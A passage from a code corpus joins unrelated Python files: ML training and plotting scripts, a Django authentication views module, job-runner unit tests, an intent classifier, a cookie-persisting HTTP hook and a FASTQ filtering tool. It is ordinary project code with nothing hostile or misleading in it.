v,x=NAG_Method(v,x,mu,lr,dx)
Mdx=Gradient(Mx,delta)
Mv,Mx=Momentum_Method(Mv,Mx,mu,lr,Mdx)
Adx=Gradient(Ax,delta)
Av,cache,Ax=Adam_Method(i+1,Av,cache,Ax,mu,decay_rate,Alr,Adx)
dxx=Gradient(xx,delta)
xx=GD_Method(xx,ilr,dxx)
NAG[i+1,0]=x
NAG[i+1,1]=F(x)
NAG[i+1,2]=i+1
M[i+1,0]=Mx
M[i+1,1]=F(Mx)
M[i+1,2]=i+1
Adam[i+1,0]=Ax
Adam[i+1,1]=F(Ax)
Adam[i+1,2]=i+1
GD[i+1,0]=xx
GD[i+1,1]=F(xx)
GD[i+1,2]=i+1
THE[N-i-1,0]=ix-(i+1)/N*lx/5
THE[N-i-1,1]=F(THE[N-i-1,0])
THE[N+i+1,0]=ix+(i+1)/N*lx
THE[N+i+1,1]=F(THE[N+i+1,0])
#
return(NAG,M,Adam,GD,THE)
################################################################################
def main():
#
NAG,M,Adam,GD,THE=Data()
#
fig1=mpl.figure()
mpl.scatter(NAG[:,0],NAG[:,1],marker='o',color='',edgecolors='r',s=10,label='NAG')
mpl.scatter(M[:,0],M[:,1],marker='^',color='',edgecolors='g',s=10,label='Momentum')
mpl.scatter(Adam[:,0],Adam[:,1],marker='X',color='',edgecolors='b',s=10,label='Adam')
mpl.scatter(GD[:,0],GD[:,1],marker='*',color='',edgecolors='m',s=10,label='GD')
mpl.plot(THE[:,0],THE[:,1],'k--',markersize=4,label='THE')
mpl.legend(loc='upper right',fontsize='xx-small')
mpl.xlabel('$x$')
mpl.ylabel('$y$')
mpl.savefig('Function.png',dpi=600)
#
fig2=mpl.figure()
mpl.scatter(NAG[:,2],NAG[:,0],marker='o',color='',edgecolors='r',s=10,label='NAG')
mpl.scatter(M[:,2],M[:,0],marker='^',color='',edgecolors='g',s=10,label='Momentum')
mpl.scatter(Adam[:,2],Adam[:,0],marker='X',color='',edgecolors='b',s=10,label='Adam')
mpl.scatter(GD[:,2],GD[:,0],marker='*',color='',edgecolors='m',s=10,label='GD')
mpl.legend(loc='upper right',fontsize='xx-small')
mpl.xlabel('$Loops$')
mpl.ylabel('$x$')
mpl.savefig('x_Loop.png',dpi=600)
#
fig3=mpl.figure()
mpl.scatter(NAG[:,2],NAG[:,1],marker='o',color='',edgecolors='r',s=10,label='NAG')
mpl.scatter(M[:,2],M[:,1],marker='^',color='',edgecolors='g',s=10,label='Momentum')
mpl.scatter(Adam[:,2],Adam[:,1],marker='X',color='',edgecolors='b',s=10,label='Adam')
mpl.scatter(GD[:,2],GD[:,1],marker='*',color='',edgecolors='m',s=10,label='GD')
mpl.legend(loc='upper right',fontsize='xx-small')
mpl.xlabel('$Loops$')
mpl.ylabel('$y$')
mpl.savefig('y_Loop.png',dpi=600)
#
#mpl.show()
mpl.close()
################################################################################
if __name__ == "__main__":
main()
| 4,728 |
src/sklearn_evaluation/plot/learning_curve.py
|
abcnishant007/sklearn-evaluation
| 351 |
2172707
|
import numpy as np
import matplotlib.pyplot as plt
def learning_curve(train_scores, test_scores, train_sizes, ax=None):
"""Plot a learning curve
Plot a metric vs number of examples for the training and test set
Parameters
----------
train_scores : array-like
Scores for the training set
test_scores : array-like
Scores for the test set
train_sizes : array-like
Relative or absolute numbers of training examples used to generate
the learning curve
ax : matplotlib Axes
Axes object to draw the plot onto, otherwise uses current Axes
Returns
-------
ax: matplotlib Axes
Axes containing the plot
Examples
--------
.. plot:: ../../examples/learning_curve.py
"""
if ax is None:
ax = plt.gca()
ax.grid()
ax.set_title("Learning Curve")
ax.set_xlabel("Training examples")
ax.set_ylabel("Score mean")
train_scores_mean = np.mean(train_scores, axis=1)
train_scores_std = np.std(train_scores, axis=1)
test_scores_mean = np.mean(test_scores, axis=1)
test_scores_std = np.std(test_scores, axis=1)
ax.fill_between(train_sizes, train_scores_mean - train_scores_std,
train_scores_mean + train_scores_std, alpha=0.1,
color="r")
ax.fill_between(train_sizes, test_scores_mean - test_scores_std,
test_scores_mean + test_scores_std, alpha=0.1, color="g")
ax.plot(train_sizes, train_scores_mean, 'o-', color="r",
label="Training score")
ax.plot(train_sizes, test_scores_mean, 'o-', color="g",
label="Cross-validation score")
ax.legend(loc="best")
ax.margins(0.05)
return ax
| 1,728 |
src/gan-dogs/data/preprocessing.py
|
caciolai/Generative-Dog-Images-with-BigGan
| 0 |
2172185
|
import tensorflow as tf
@tf.function
def augment(img):
"""Augments the current image
Args:
img (tf.Tensor): image
Returns:
tf.Tensor: augmented image
"""
# random mirroring
img = tf.image.random_flip_left_right(img)
# # randomly adjust saturation and brightness
# img = tf.image.random_saturation(img, 0, 1)
# img = tf.image.random_brightness(img, 0.1)
# img = tf.clip_by_value(img, -1., 1.)
return img
@tf.function
def preprocess(img, y):
"""Preprocessing pipeline for a (image, label) sample
Args:
img (tf.Tensor): image
y (tf.Tensor): label
Returns:
(tf.Tensor, tf.Tensor): transformed (image, label) sample
"""
# normalization in [-1, 1]
# img = normalize(img)
# data augmentation
img = augment(img)
return img, y
| 850 |
cadnano/views/abstractitems/abstractvirtualhelixitem.py
|
mctrinh/cadnano2.5
| 1 |
2170373
|
# -*- coding: utf-8 -*-
from cadnano.extras.wrapapi import copyWrapAPI
from cadnano.part.virtualhelix import VirtualHelix
class AbstractVirtualHelixItem(object):
"""
AbstractVirtualHelixItem is a base class for virtualhelixitem in all views.
It includes slots that get connected in VirtualHelixItemController which
can be overridden.
Slots that must be overridden should raise an exception.
"""
def __init__(self, model_virtual_helix=None, parent=None):
# super().__init__(**kwargs)
self._model_vh = model_virtual_helix
self._id_num = model_virtual_helix.idNum() if model_virtual_helix is not None else None
self._part_item = parent
self._model_part = model_virtual_helix.part() if model_virtual_helix is not None else None
self.is_active = False
# end def
def virtualHelixPropertyChangedSlot(self, virtual_helix, transform):
pass
# end def
def virtualHelixRemovedSlot(self):
pass
# end def
def strandAddedSlot(self, sender, strand):
pass
# end def
def cnModel(self):
return self._model_vh
# end def
def partItem(self):
return self._part_item
# end def
# end class
# ADD model methods to class
copyWrapAPI(VirtualHelix, AbstractVirtualHelixItem, attr_str='_model_vh')
| 1,338 |
Ejercicios metodos de colecciones/Ejercicios_diccionarios.py
|
jaramosperez/Pythonizando
| 1 |
2173107
|
colores = { "amarillo":"yellow", "azul":"blue", "verde":"green" }
print(colores.get('Negro'))
print(colores.keys())
print(colores.values())
colores.items()
for clave, valor in colores.items():
print(clave, valor)
print(colores.pop("amarillo", "no se ha encontrado"))
print(colores.pop("Negro", "no se ha encontrado"))
colores.clear()
print(colores)
| 358 |
fasionAI.py
|
Endersky78/AIProject
| 0 |
2172701
|
import tensorflow as tf
from tensorflow import keras
import numpy as np
import matplotlib.pyplot as plt
import os
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
data = keras.datasets.fashion_mnist
np.set_printoptions(precision=4)
class_names = ['T-shirt/Top', 'Trouser', 'Pullover', 'Dress', 'Coat',
'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']
(train_images, train_labels), (test_images, test_labels) = data.load_data()
train_images = train_images.astype('float32') / 255.0
test_images = test_images.astype('float32') / 255.0
model = keras.Sequential([
keras.layers.Flatten(input_shape=(28, 28)),
keras.layers.Dense(128, activation='relu'),
keras.layers.Dense(10, activation='softmax')
])
model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['accuracy'])
model.fit(train_images, train_labels, batch_size=64, epochs=10)
prediction = model.predict([test_images])
for i in range(5):
plt.grid(False)
plt.imshow(test_images[i], cmap=plt.cm.binary)
plt.xlabel("Actual: " + class_names[test_labels[i]])
plt.title("Prediction: " + class_names[np.argmax(prediction[i])])
plt.show()
print(class_names[np.argmax(prediction[0])])
| 1,203 |
main.py
|
psoulos/space-of-representations
| 0 |
2173061
|
import os
import tensorflow as tf
import time
# See the __init__ script in the models folder
# `make_models` is a helper function to load any models you have
from models import FullyConnectedDiscriminator, ConvDiscriminator, FullyConnectedVAE, ConvVAE
dir = os.path.dirname(os.path.realpath(__file__))
flags = tf.app.flags
# Model config
flags.DEFINE_boolean('conv', True, 'Whether the hidden layer is convolution or fully connected')
flags.DEFINE_boolean('vae', True, 'Whether the model is generative (vae) or discriminative')
flags.DEFINE_string('activation', 'relu', 'The hidden layer activation function {relu|sigmoid}')
flags.DEFINE_integer('hidden_size', 10, 'The number of units in the hidden layer for fully '
'connected discriminator or the number of features for a convolutional '
'discriminator. The size of the latent vector for a VAE.')
flags.DEFINE_integer('kernel_size', 5, 'The size of the convolution patch')
flags.DEFINE_integer('num_features', 5, 'The number of features for a convolution layer')
flags.DEFINE_integer('beta', 1, 'The coefficient to impose on the VAE divergence.'
' 1 is a standard VAE.')
# Training config
flags.DEFINE_float('learning_rate', 1e-3, 'The learning rate')
flags.DEFINE_integer('num_epochs', 1, 'The number of epochs to train for')
flags.DEFINE_integer('iter_per_epoch', 50000, 'The number of iterations per epoch')
# Other config
flags.DEFINE_string('model_name', 'model', 'Unique name of the model')
flags.DEFINE_string('result_dir', dir + '/results/' + flags.FLAGS.model_name + '/' +
time.strftime('%Y-%m-%d-%H-%M-%S'), 'Name of the directory to store/log the '
'model (if it exists, the model will be loaded from it)')
def main(_):
config = flags.FLAGS.__flags.copy()
if config['vae']:
if config['conv']:
print('Training a convolutional vae')
model = ConvVAE(config)
else:
print('Training a fully connected vae')
model = FullyConnectedVAE(config)
else:
if config['conv']:
print('Training a convolutional discriminator')
model = ConvDiscriminator(config)
else:
print('Training a fully connected discriminator')
model = FullyConnectedDiscriminator(config)
print('Model created')
model.train()
if __name__ == '__main__':
tf.app.run()
| 2,461 |
professionnel/views.py
|
john591/m243
| 0 |
2171558
|
from django.http import HttpResponse, Http404, HttpResponseRedirect
from django.shortcuts import get_object_or_404
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
#from . serializers import UserProfilSerializer
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import authenticate, login, logout
from django.contrib import messages
from django.contrib.auth.decorators import login_required
# Create your views here.
from .models import *
from .forms import CreateUserForm, UserProfilForm, UserSearchForm
def home(request):
if request.user.is_authenticated:
return redirect('accueil')
else:
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password')
user = authenticate(request, username=username, password=password)
if user is not None:
login(request, user)
return redirect('accueil')
else:
messages.info(request, 'Nom utilisateur ou Mot de passe incorrect!')
context = {}
return render(request, "professionnel/index.html", context)
def logoutUser(request):
logout(request)
return redirect('home')
def registerPage(request):
if request.user.is_authenticated:
return redirect('accueil')
else:
form = CreateUserForm()
profil_form = UserProfilForm()
if request.method == 'POST':
form = CreateUserForm(request.POST)
profil_form = UserProfilForm(request.POST)
if form.is_valid() and profil_form.is_valid():
user = form.save()
profil = profil_form.save(commit=False)
profil.user = user
profil.save()
user = form.cleaned_data.get('username')
messages.success(request, user + ' ' + 'votre compte a été créé !' )
return redirect('home')
context = {'form':form, 'profil_form':profil_form}
return render(request, 'professionnel/register.html', context)
@login_required(login_url='home')
def accueilPage(request):
context = {}
return render(request, 'professionnel/accueil.html', context)
@login_required(login_url='home')
def findPage(request):
queryset = UserProfil.objects.all()
form = UserSearchForm(request.POST or None)
context = {'queryset':queryset,'form':form}
if request.method == 'POST':
queryset = UserProfil.objects.all().order_by('id').filter(profession__icontains=form['profession'].value(),commune__icontains=form['commune'].value(),quartier__icontains=form['quartier'].value())
context = {
'queryset':queryset,
'form':form
}
return render(request, 'professionnel/find.html', context)
"""
class UserProfilList(APIView):
def get(self, request):
userProfessional = UserProfil.objects.all()
serializer = UserProfilSerializer(userProfessional, many= True)
return Response(serializer.data)
def post(self):
pass
"""
| 3,308 |
cm/tests_runner.py
|
amleshkov/adcm
| 0 |
2171912
|
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from unittest.mock import patch, Mock, mock_open
from django.test import TestCase
from django.utils import timezone
import cm.config as config
import job_runner
import task_runner
from cm.logger import log
from cm.models import TaskLog, JobLog
class PreparationData:
def __init__(self, number_tasks, number_jobs):
self.number_tasks = number_tasks
self.number_jobs = number_jobs
self.tasks = []
self.jobs = []
self.to_prepare()
def to_prepare(self):
for task_id in range(1, self.number_tasks + 1):
task_log_data = {
'action_id': task_id,
'object_id': task_id,
'pid': task_id,
'selector': {'cluster': task_id},
'status': 'success',
'config': '',
'hostcomponentmap': '',
'start_date': timezone.now(),
'finish_date': timezone.now()
}
self.tasks.append(TaskLog.objects.create(**task_log_data))
for jn in range(1, self.number_jobs + 1):
job_log_data = {
'task_id': task_id,
'action_id': task_id,
'pid': jn + 1,
'selector': {'cluster': task_id},
'status': 'success',
'start_date': timezone.now(),
'finish_date': timezone.now()
}
self.jobs.append(JobLog.objects.create(**job_log_data))
def get_task(self, _id):
return self.tasks[_id - 1]
def get_job(self, _id):
return self.jobs[_id - 1]
class TestTaskRunner(TestCase):
def setUp(self):
log.debug = Mock()
log.error = Mock()
log.info = Mock()
@patch('builtins.open')
def test_open_file(self, _mock_open):
file_path = "{}/{}-{}.txt".format('root', 'tag', 1)
task_runner.open_file('root', 1, 'tag')
_mock_open.assert_called_once_with(file_path, 'w')
@patch('subprocess.Popen')
def test_run_job(self, mock_subprocess_popen):
process_mock = Mock()
attrs = {'wait.return_value': 0}
process_mock.configure_mock(**attrs)
mock_subprocess_popen.return_value = process_mock
code = task_runner.run_job(1, 1, '', '')
self.assertEqual(code, 0)
@patch('task_runner.open_file')
@patch('cm.job.set_task_status')
@patch('cm.job.re_prepare_job')
@patch('task_runner.run_job')
@patch('cm.job.finish_task')
def test_run_task(self, mock_finish_task, mock_run_job, mock_re_prepare_job,
mock_set_task_status, mock_open_file):
mock_run_job.return_value = 0
_file = Mock()
mock_open_file.return_value = _file
pd = PreparationData(1, 1)
task_runner.run_task(1)
task = pd.get_task(1)
job = pd.get_job(1)
mock_finish_task.assert_called_once_with(task, job, config.Job.SUCCESS)
mock_run_job.assert_called_once_with(task.id, job.id, _file, _file)
mock_re_prepare_job.assert_not_called()
mock_set_task_status.assert_called_once_with(task, config.Job.RUNNING)
self.assertTrue(JobLog.objects.get(id=1).start_date != job.start_date)
@patch('task_runner.run_task')
@patch('sys.exit')
def test_do(self, mock_exit, mock_run_task):
with patch('sys.argv', [__file__, 1]):
task_runner.do()
self.assertEqual(mock_exit.call_count, 0)
mock_run_task.assert_called_once_with(1)
class TestJobRunner(TestCase):
def setUp(self):
log.info = Mock()
log.debug = Mock()
log.error = Mock()
@patch('builtins.open')
def test_open_file(self, _mock_open):
file_path = "{}/{}-{}.txt".format('root', 'tag', 1)
job_runner.open_file('root', 1, 'tag')
_mock_open.assert_called_once_with(file_path, 'w')
@patch('json.load')
@patch('builtins.open', create=True)
def test_read_config(self, _mock_open, mock_json):
_mock_open.side_effect = mock_open(read_data='').return_value
mock_json.return_value = {}
conf = job_runner.read_config(1)
file_name = '{}/{}-config.json'.format(config.RUN_DIR, 1)
_mock_open.assert_called_once_with(file_name)
self.assertDictEqual(conf, {})
@patch('cm.job.set_job_status')
def test_set_job_status(self, mock_set_job_status):
mock_set_job_status.return_value = None
code = job_runner.set_job_status(1, 0, 1)
self.assertEqual(code, 0)
mock_set_job_status.assert_called_once_with(1, config.Job.SUCCESS, 1)
def test_set_pythonpath(self):
cmd_env = os.environ.copy()
python_paths = filter(
lambda x: x != '',
['./pmod'] + cmd_env.get('PYTHONPATH', '').split(':'))
cmd_env['PYTHONPATH'] = ':'.join(python_paths)
self.assertDictEqual(cmd_env, job_runner.set_pythonpath())
@patch('cm.job.set_job_status')
@patch('sys.exit')
@patch('job_runner.set_job_status')
@patch('job_runner.set_pythonpath')
@patch('subprocess.Popen')
@patch('os.chdir')
@patch('job_runner.open_file')
@patch('job_runner.read_config')
def test_run_ansible( # pylint: disable=too-many-arguments
self, mock_read_config, mock_open_file, mock_chdir, mock_subprocess_popen,
mock_set_pythonpath, mock_set_job_status, mock_exit, mock_job_set_job_status):
conf = {
'job': {'playbook': 'test'},
'env': {'stack_dir': 'test'}
}
mock_read_config.return_value = conf
_file = Mock()
mock_open_file.return_value = _file
process_mock = Mock()
process_mock.pid = 1
attrs = {'wait.return_value': 0}
process_mock.configure_mock(**attrs)
mock_subprocess_popen.return_value = process_mock
python_path = Mock()
mock_set_pythonpath.return_value = python_path
job_runner.run_ansible(1)
mock_read_config.assert_called_once_with(1)
self.assertEqual(mock_open_file.call_count, 2)
mock_open_file.assert_any_call(config.LOG_DIR, 'ansible-out', 1)
mock_open_file.assert_any_call(config.LOG_DIR, 'ansible-err', 1)
mock_chdir.assert_called_with(conf['env']['stack_dir'])
mock_set_job_status.assert_called_once_with(1, 0, 1)
mock_subprocess_popen.assert_called_once_with(
[
'ansible-playbook',
'-e',
'@{}/{}-config.json'.format(config.RUN_DIR, 1),
'-i',
'{}/{}-inventory.json'.format(config.RUN_DIR, 1),
conf['job']['playbook']
], env=python_path, stdout=_file, stderr=_file)
self.assertEqual(mock_set_pythonpath.call_count, 1)
self.assertEqual(mock_exit.call_count, 1)
mock_job_set_job_status.assert_called_with(1, config.Job.RUNNING, 1)
@patch('job_runner.run_ansible')
@patch('sys.exit')
def test_do(self, mock_exit, mock_run_ansible):
with patch('sys.argv', [__file__, 1]):
job_runner.do()
self.assertEqual(mock_exit.call_count, 0)
self.assertEqual(mock_run_ansible.call_count, 1)
mock_run_ansible.assert_called_once_with(1)
| 7,905 |
DialogEngine/res/entities/classifier/module/processQuery.py
|
hmi-digital/bot_platform
| 0 |
2172667
|
# -*- coding: utf-8 -*-
import os
import glob
import sys
import re
import codecs
import _pickle as cPickle
from nltk.stem import SnowballStemmer
from nltk import word_tokenize
from nltk.corpus import stopwords
from sklearn.metrics.pairwise import linear_kernel
domain=sys.argv[1]
scriptDir=os.path.dirname(__file__)
picklePath=os.path.join(scriptDir,'..','model',domain+'_')
intent=cPickle.load(open(picklePath+'intent.m','rb'))
utterance=cPickle.load(open(picklePath+'utterance.m','rb'))
tfidfVec=cPickle.load(open(picklePath+'tfidfVec.m','rb'))
svd=cPickle.load(open(picklePath+'svd.m','rb'))
trainLSA=cPickle.load(open(picklePath+'trainLSA.m','rb'))
stopwordFile=os.path.join(scriptDir,'..','..','..','dictionary','stopwords_en.txt')
arrayWords=[]
stopWords=[]
sList=[line.rstrip('\n')for line in codecs.open((stopwordFile),'r+','utf-8')]
for line in sList:
if line!="":
arrayWords.append(line.split(','))
for a_word in arrayWords:
for s_word in a_word:
if(re.sub(' ','',s_word))!="":
stopWords.append(s_word)
swList=set(stopWords)
stopwordList=set(stopwords.words('english'))|swList
def stopwordRemover(utterance):
word_tokens=word_tokenize(utterance)
return ' '.join([w for w in word_tokens if not w in stopwordList])
def replace_nth(string,sub,repl,nth):
find=string.find(sub)
i=find!=-1
while find!=-1 and i!=nth:
find=string.find(sub,find+1)
i+=1
if i==nth:
return string[:find]+repl+string[find+len(sub):]
return string
def wordReplacer(utter,matchedDict,combinations):
matchedDict=matchedDict.copy()
while(len(matchedDict)>0):
replacement=matchedDict.popitem()
for wordReplacement in replacement[1]['synonym']:
new_utter=utter.replace(replacement[0],wordReplacement)
combinations.append(new_utter)
wordReplacer(new_utter,matchedDict,combinations)
def genSentences(utter,matchedDict,combinations):
matchedDict=matchedDict.copy()
while(len(matchedDict)>0):
replacement=matchedDict.popitem()
for count in range(replacement[1]['count']):
for wordReplacement in replacement[1]['synonym']:
new_utter=replace_nth(utter,replacement[0],wordReplacement,count+1)
combinations.append(new_utter)
wordReplacer(new_utter,matchedDict,combinations)
def processUtterance(utter):
scoreList={}
idList={}
for query in utter:
query=stopwordRemover(query.lower())
query=[query]
test=tfidfVec.transform(query).toarray()
LSATest=svd.transform(test)
cosineSimilarities=linear_kernel(LSATest,trainLSA).flatten()
related_docs_indices=cosineSimilarities.argsort()[::-1]
for i in range(len(related_docs_indices)):
fID=related_docs_indices[i]
fScore=cosineSimilarities[fID]
fIntent=intent[related_docs_indices[i]]
if(fIntent in scoreList):
scoreList[fIntent]=max(fScore,scoreList[fIntent])
if(fScore>cosineSimilarities[idList.get(fIntent)]):
idList[fIntent]=fID
else:
scoreList[fIntent]=fScore
idList[fIntent]=fID
orderedIntents=sorted(scoreList,key=scoreList.get,reverse=True)
response={'class_1':orderedIntents[0],'score_1':"{:.2f}".format(scoreList[orderedIntents[0]])}
return response
synonymFile=os.path.join(scriptDir,'..','..','..','dictionary','synonyms_en.txt')
with codecs.open(synonymFile,'r','utf-8')as rawSynonymsFileobj:
rawSynonyms=rawSynonymsFileobj.read()
rawSynonyms=rawSynonyms.split('\n')
synonymsList=[]
for i in rawSynonyms:
synonymsList.append(i.split(','))
def genUtterances(utter):
matched={}
utteranceSet=set(utter.split())
for synonym in synonymsList:
for word in set(synonym)&utteranceSet:
count=utter.split().count(word)
matched[word]={'synonym':list(set(synonym)-set([word])),'count':count}
combinations=[utter]
genSentences(utter,matched,combinations)
combinations.sort()
return combinations
# Created by pyminifier (https://github.com/liftoff/pyminifier)
| 3,798 |
src/others/tests/test_sparse_similarity.py
|
seahrh/coding-interview
| 0 |
2171882
|
from others.sparse_similarity import *
class TestSparseSimilarity:
def test_given_example_1(self):
assert positive_similarity(
[
Document(id=13, words={14, 15, 100, 9, 3}),
Document(id=16, words={32, 1, 9, 3, 5}),
Document(id=19, words={15, 29, 2, 6, 8, 7}),
Document(id=24, words={7, 10, 11}),
]
) == [
Pair(d1=16, d2=13, sim=0.25),
Pair(d1=19, d2=24, sim=0.125),
Pair(d1=19, d2=13, sim=0.1),
]
| 567 |
dashapp/functions.py
|
anas-rabhi/quick-dash
| 0 |
2173008
|
import dash
import numpy as np
from dash import dcc, html
from dash.dependencies import Input, Output
from typing import Dict, List, Callable
import pandas as pd
filters = {
'checklist': dcc.Checklist, # labelStyle={'display': 'inline-block'}
'alert': dcc.ConfirmDialog,
'date_range': dcc.DatePickerRange,
'dropdown': dcc.Dropdown,
'checkbox': dcc.RadioItems,
'range_slider': dcc.RangeSlider,
'slider': dcc.Slider
}
######## ADD checkbox & radioitems
######## text box output
def show():
print(filters)
def define_params(data: pd.DataFrame, ftype: str, var: str, id: str, **params):
displayed = filters[ftype]
param = {}
if ftype in ['slider']:
if 'value' not in params:
params['value'] = data[var].max()
param['id'] = id
param['min'] = data[var].min()
param['max'] = data[var].max()
param['step'] = (data[var].max() - data[var].min())/10
param['tooltip'] = {"placement": "bottom", "always_visible": True}
return displayed(**param, **params)
if ftype in ['dropdown']:
if 'value' not in params:
params['value'] = None
param['options'] = [{'label': i, 'value': i} for i in data[var].unique().tolist()]
param['id'] = id
return displayed(**param, **params)
if ftype in ['date_range']:
param['id'] = id
param['min_date_allowed'] = data[var].min()
param['max_date_allowed'] = data[var].min()
param['initial_visible_month'] = data[var].min()
return displayed(**param, **params)
#data = pd.DataFrame({'a': ['c', 'd'], 'b': [20, 40]})
#define_params(data, 'checklist', 'a', '555a')
| 1,697 |
snafu/benchmarks/__init__.py
|
dagrayvid/benchmark-wrapper
| 14 |
2172997
|
#!/usr/bin/env python3
"""snafu benchmark wrappers."""
# -*- coding: utf-8 -*-
# flake8: noqa
# pylint: disable=W0611
from snafu.benchmarks._benchmark import Benchmark, BenchmarkResult
from snafu.benchmarks._load_benchmarks import load_benchmarks
DETECTED_BENCHMARKS = load_benchmarks()
| 288 |
hooks/cookies.py
|
leigingban/webtools
| 0 |
2171397
|
import json
import re
from json import JSONDecodeError
from ext_app.webtools.hooks import BaseHook
class CookieSavingHook(BaseHook):
def __init__(self, file=None, path=None):
super().__init__(file, path)
def run(self):
if cookie := self.r.headers.get('Set-Cookie'):
cookie_new = self.cookies_from_response(cookie)
# 域名 + 目录作为唯一索引,方便进行更新替代
uni_cookies_name = cookie_new.get('Domain') + cookie_new.get('Path')
cookies_org = self.load_cookies_from_file()
cookies_org.update({uni_cookies_name: cookie_new})
self.save_cookies_to_json(cookies_org)
else:
pass
@property
def domain(self) -> str:
return re.findall('//(.*?)/', self.r.url)[0]
def cookies_from_response(self, cookie: str):
"""
__ckguid=WS44Xy95cAbHEjgVRAo4Nq2; Max-Age=31536000; Domain=smzdm.com; Path=/; HttpOnly,
__jsluid_s=8e8770c491de42ddea726d37aa4cb2e2; max-age=31536000; path=/; HttpOnly; secure
"""
cookie = cookie
_dict = {}
_kvs = {}
for first_items in cookie.split(', '):
for second_items in first_items.split('; '):
_kv = second_items.split('=')
if _kv[0] == "Domain":
_dict["Domain"] = _kv[1]
elif _kv[0] == "Path":
_dict["Path"] = _kv[1]
elif _kv[0] == "max-age":
_dict["max-age"] = _kv[1]
elif _kv[0] == "Expires":
_dict["Expires"] = _kv[1]
elif _kv[0] == "httponly":
_dict["httponly"] = True
elif _kv[0] == "secure":
_dict["secure"] = True
else:
if len(_kv) > 1:
_kvs.update({_kv[0]: _kv[1]})
_dict['kvs'] = _kvs
_dict.setdefault("domain", self.domain)
return _dict
def load_cookies_from_file(self):
try:
with open(self.file, 'r') as f:
data = json.load(f)
except Exception as e:
if isinstance(e, FileNotFoundError) or isinstance(e, JSONDecodeError):
print('无法读取数据,数据未初始化!')
return {}
return data
def save_cookies_to_json(self, data):
try:
with open(self.file, 'w') as f:
json.dump(data, f, indent=2)
except Exception as e:
print(e)
| 2,508 |
galaxy_utils/sequence/scripts/fastq_filter.py
|
galaxyproject/sequence_utils
| 5 |
2172650
|
# <NAME>
import os
import shutil
import sys
from galaxy_utils.sequence.fastq import fastqReader, fastqWriter
def execfile(path, vars):
with open(path) as f:
code = compile(f.read(), path, 'exec')
exec(code, vars)
def main():
# Read command line arguments
input_filename = sys.argv[1]
script_filename = sys.argv[2]
output_filename = sys.argv[3]
additional_files_path = sys.argv[4]
input_type = sys.argv[5] or 'sanger'
# Save script file for debuging/verification info later
os.mkdir(additional_files_path)
shutil.copy(script_filename, os.path.join(additional_files_path, 'debug.txt'))
i = None
reads_kept = 0
execfile(script_filename, globals())
# Dan, Others: Can we simply drop the "format=input_type" here since it is specified in reader.
# This optimization would cut runtime roughly in half (for my test case anyway). -John
writer = fastqWriter(path=output_filename, format=input_type)
reader = fastqReader(path=input_filename, format=input_type)
with writer, reader:
for i, fastq_read in enumerate(reader):
ret_val = fastq_read_pass_filter(fastq_read) # fastq_read_pass_filter defined in script_filename # NOQA
if ret_val:
writer.write(fastq_read)
reads_kept += 1
if i is None:
print("Your file contains no valid fastq reads.")
else:
print(f'Kept {reads_kept} of {i + 1} reads ({float(reads_kept) / float(i + 1) * 100.0:.2f}%).')
if __name__ == "__main__":
main()
| 1,562 |
PhoneProbes/eval_phones.py
|
archiki/ASR-Accent-Analysis
| 12 |
2171821
|
import torch
import torch.nn.functional as F
from torch import nn
from torch.utils.data import DataLoader
from torch.autograd import Variable
from model import PhoneNet
from data_loader import PhoneDataset
import argparse
import pdb
import time
from tqdm import tqdm
from torch.nn.parallel import DistributedDataParallel
import multiprocessing
import os
import json
def custom_collate_fn(batch):
batch_size = len(batch)
out_batch = []
for x in range(batch_size):
sample = batch[x]
data = sample[0].to('cuda', non_blocking = True)
label = torch.tensor(sample[1])
label = label.to('cuda', non_blocking = True)
out_batch.append((data,label))
# print(type(batch[1]))
return out_batch
def eval_phones(test_path,rep_type, batch_size, num_epochs, inp_dim0, inp_dim1, model_path, hidden_dim = 500, all_gpu=False):
cuda = torch.cuda.is_available()
test_set = PhoneDataset(rep_type, test_path)
inp_dim = (inp_dim0, inp_dim1)
# torch.set_num_threads(32)
net = PhoneNet(inp_dim, hidden_dim)
criterion = nn.CrossEntropyLoss()
if(cuda):
net = net.cuda()
criterion = criterion.cuda()
net = torch.nn.DataParallel(net)
state_dict = torch.load(model_path)
try:
net.load_state_dict(state_dict)
except:
new_state_dict = OrderedDict()
for k, v in state_dict.items():
name = k[7:]
new_state_dict[name] = v
#net = torch.nn.DataParallel(net)
net.load_state_dict(new_state_dict)
valid_phones = ['ao', 'ae', 'r', 'eh', 't', 'b', 'aa', 'f', 'k', 'ng', 's', 'g', 'ow', 'er', 'l', 'th', 'z', 'aw', 'd', 'dh', 'sh', 'hh', 'iy', 'ch', 'm', 'ey', 'v', 'y', 'zh', 'jh', 'p', 'uw', 'ah', 'w', 'n', 'oy', 'ay', 'ih', 'uh']
phone_dict = {x:0 for x in valid_phones}
phone_accuracy = {x:0 for x in valid_phones}
confusion_dict = {x:phone_dict for x in valid_phones}
if(not all_gpu):
test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=True, num_workers = multiprocessing.cpu_count()//4, pin_memory = True)
else:
test_loader = DataLoader(test_set, batch_size=batch_size, shuffle=True)
print('Loading finished')
for epoch in range(num_epochs):
train_loss = 0
test_loss = 0
train_total = 0
test_total = 0
train_correct = 0
test_correct = 0
#
net.eval()
# print("----------- %s Pass seconds --------------" % (time.time() - start_time))
for rep, label in test_loader:
rep = Variable(rep)
label = Variable(label)
if(cuda):
rep = rep.cuda()
label = label.cuda()
pred = net(rep)
tloss = criterion(pred, label)
test_loss += tloss.item()
_, predicted = torch.max(pred.data, 1)
gt = valid_phones[label]
y = valid_phones[predicted]
confusion_dict[gt][y] += 1
#test_total += label.size(0)
#test_correct += (predicted == label).sum().item()
#calculate loss
#calculate accuracy
accent = test_path.split('/')[-2]
with open('confusion_{}_{}.json'.format(rep_type, accent), 'w+') as f:
json.dump(confusion_dict, f)
parser = argparse.ArgumentParser(description='Take command line arguments')
parser.add_argument('--test_path',type=str)
parser.add_argument('--rep_type',type=str)
